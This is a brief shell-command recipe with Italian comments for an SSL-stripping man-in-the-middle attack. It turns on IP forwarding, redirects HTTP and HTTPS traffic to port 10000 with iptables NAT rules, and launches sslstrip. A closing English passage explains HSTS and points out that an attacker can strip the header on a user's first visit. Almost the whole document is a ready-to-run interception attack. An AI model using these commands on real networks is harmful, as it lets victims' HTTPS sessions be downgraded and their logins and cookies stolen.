#Tool necessari: sslstrip(http://www.thoughtcrime.org/software/sslstrip) Python >= 2.5 and the python "twisted-web" module (apt-get install python-twisted-web)

#Prima MITM 

#Abilitare l'ip forward
echo 1 > /proc/sys/net/ipv4/ip_forward

#Regole ipforward:
#Tutti i pacchetti https verso ssl strip
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 10000

#Evitare che il client generi https
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 10000

#Avviare ssl strip
sslstrip -l 10000

#Take care to HSTS
#HTTP Strict Transport Security (HSTS) is a web security policy mechanism which is necessary to protect secure HTTPS
#websites against downgrade attacks, and which greatly simplifies protection against cookie hijacking.
#It allows web servers to declare that web browsers (or other complying user agents) should only interact with it
#using secure HTTPS connections, and never via the insecure HTTP protocol. HSTS is an IETF standards track protocol
# and is specified in RFC 6797.
#HSTS informing the browser that connections to the site should always use TLS/SSL. The HSTS header can be stripped by 
#the attacker if this is the user's first visit. Google Chrome, Mozilla Firefox, Internet Explorer and Spartan attempt 
#to limit this problem by including a "pre-loaded" list of HSTS sites.